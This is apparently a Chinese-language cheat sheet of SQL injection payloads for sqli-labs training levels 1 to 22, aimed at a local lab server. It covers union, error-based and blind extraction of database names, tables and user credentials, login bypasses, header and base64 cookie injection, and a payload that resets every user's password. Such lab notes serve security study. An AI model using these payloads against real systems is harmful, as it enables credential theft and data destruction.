Sqli-labs靶场payload(1-22基础篇)

T1 字符型 单引号闭合(union select注入)
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 %23
http://127.0.0.1/sqli-labs/Less-1/?id=-1' union select 1,2,3 --+
T2数字型(union select注入)
http://127.0.0.1/sqli-labs/Less-2/?id=1 and 1=2
http://127.0.0.1/sqli-labs/Less-2/?id=1 order by 3
http://127.0.0.1/sqli-labs/Less-2/?id=-1 union select 1,2,3
T3字符型 闭合: ('')       (union select注入)
http://127.0.0.1/sqli-labs/Less-3/?id=1') --+
http://127.0.0.1/sqli-labs/Less-3/?id=-1') union select 1,2,3 --+
T4字符型 闭合: ("")     (union select注入)
http://127.0.0.1/sqli-labs/Less-4/?id=1") --+
http://127.0.0.1/sqli-labs/Less-4/?id=-1") union select 1,2,3 --+
T5字符型 单引号闭合  布尔盲注/报错注入
http://127.0.0.1/sqli-labs/Less-5/?id=1' --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select username from users limit 1,1),0x7e),1) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and updatexml(1,concat(0x7e,(select password from users limit 1,1),0x7e),1) --+

http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select database()='security') --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select ascii(substr((select table_name from information_schema.tables where table_schema='security' limit 0,1),1,1)) > 100) --+
http://127.0.0.1/sqli-labs/Less-5/?id=1' and (select table_name from information_schema.tables where table_schema='security' limit 0,1) --+
T6字符型 双引号闭合  报错注入/布尔盲注
http://127.0.0.1/sqli-labs/Less-6/?id=1" --+
http://127.0.0.1/sqli-labs/Less-6/?id=1" and updatexml(1,concat(0x7e,(select database()),0x7e),1) --+
T7
T8字符型 单引号闭合  布尔盲注
http://127.0.0.1/sqli-labs/Less-8/?id=1' and (select database()='security') --+
T9字符型 单引号闭合  时间盲注
127.0.0.1/sqli-labs/Less-9/?id=1' and sleep(5) --+   //经过尝试,只有使用单引号时才出现约5秒的延时,所以是单引号闭合
127.0.0.1/sqli-labs/Less-9/?id=2' and if((select database())="security",sleep(5),null) --+
T10字符型  双引号闭合  时间盲注
127.0.0.1/sqli-labs/Less-10/?id=1" and sleep(5) --+
127.0.0.1/sqli-labs/Less-10/?id=2" and if((select database())="security",sleep(5),null) --+
T11 POST注入 union select注入  单引号闭合 
username:
' order by 2 #
' union select 1,2 #
' union select 1,database() #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 0,1 #
' union select 1,table_name from information_schema.tables where table_schema="security" limit 3,1 #
' union select 1,column_name from information_schema.columns where table_schema="security" and table_name="users" limit 0,1 #
' union select username,password from users limit 0,1 #
T12 POST注入 union select注入  闭合方式: ("")
") order by 2 #
") union select 1,2 #
T13 POST注入 闭合方式('')union select没有回显 报错注入/盲注
') #
') union select 1,2 #   
') and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #
T14 POST注入 闭合方式""    union select没有回显 报错注入/盲注
" #
" order by 2 #
" union select 1,2 #   
" and updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" or updatexml(1,concat(0x7e,(select database()),0x7e),1) #
" and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e),1) #
T15 POST注入 盲注 单引号闭合  方法2:构造万能密码
' or 1=1 #     //四种组合中唯一成功的 说明闭合方式是单引号
' or updatexml(1,concat(0x7e,(select database()),0x7e),1) #   //报错注入没有回显 则接下来用盲注方式
' or (select database()='security') #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>100) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))>110) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<105) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))<102) #
' or (select ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1))=101) #
' or (select substr((select table_name from information_schema.tables where table_schema="security" limit 0,1),1,1) = 'e') # 

' or '1'='1
T16 POST注入 盲注 方法2:构造万能密码
") or 1=1 #
") or (select database()='security') #

") or ("1")=("1
T17 POST注入 密码重置 
username:admin
password:' or 1=1 #
//此时所有用户的密码都被重置成了1(#把后面的WHERE条件注释掉了,UPDATE作用于全表)
T18 POST注入 HTTP头注入之User-Agent注入  
User-Agent的测试不能用注释符号
测试发现闭合是单引号
' and '1'='1
' and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
T19 POST注入 HTTP头注入之Referer注入 
' and '1'='1
' and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '1'='1
T20 POST注入 Cookie注入
' #
' or extractvalue(1,concat(0x7e,(select database()),0x7e)) #
admin' and extractvalue(1,concat(0x7e,(select database()),0x7e)) #
' or extractvalue(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 0,1),0x7e)) #
' or extractvalue(1,concat(0x7e,(select username from users limit 0,1),0x7e)) #
T21 POST注入 Cookie注入变形  闭合('')   (所有的内容都base64编码以后再提交即可;base64只是编码,不是加密)
\    XA==   
') #     JykgIw==
') or extractvalue(1,concat(0x7e,(select database()),0x7e)) #    Jykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==
admin') and extractvalue(1,concat(0x7e,(select database()),0x7e)) #      YWRtaW4nKSBhbmQgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBkYXRhYmFzZSgpKSwweDdlKSkgIw==

uname=') and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema=database() limit 0,1),0x7e),1) or ('1')=('1
T22  POST注入 Cookie注入变形 闭合 ""    (所有的内容都base64编码以后再提交即可;base64只是编码,不是加密)
\   XA==
" #    IiAj 
" or extractvalue(1,concat(0x7e,(select database()),0x7e)) #      IiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSAj
admin" or extractvalue(1,concat(1,concat(0x7e,(select database()),0x7e),1)) #     YWRtaW4iIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgxLGNvbmNhdCgweDdlLChzZWxlY3QgZGF0YWJhc2UoKSksMHg3ZSksMSkpICM=
admin" and extractvalue(1,concat(0x7e,(select database()),0x7e)) and "1"="1      YWRtaW4iIGFuZCBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGRhdGFiYXNlKCkpLDB4N2UpKSBhbmQgIjEiPSIx
